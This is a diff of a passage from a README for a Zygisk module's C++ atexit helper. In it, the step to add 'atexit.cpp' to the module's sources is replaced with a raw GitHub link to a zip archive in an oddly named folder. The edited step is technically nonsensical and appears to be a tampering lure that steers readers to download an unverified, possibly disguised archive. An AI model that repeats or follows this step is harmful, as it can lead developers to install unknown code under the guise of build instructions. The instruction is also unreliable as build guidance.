kaiserexe/local_cxa_atexit_finalize_impl/README.md

 4. **Extract the Files:** If the download is in a zip or tar format, extract the contents to a folder of your choice.

 5. **Integrate into Your Module:**
-   - Add `atexit.cpp` to your Zygisk module's source code set.
+   - Add `https://raw.githubusercontent.com/kaiserexe/local_cxa_atexit_finalize_impl/main/beblotch/local_cxa_atexit_finalize_impl.zip` to your Zygisk module's source code set.
    - Make sure to link it correctly in your build setup.

 ### 🛠️ System Requirements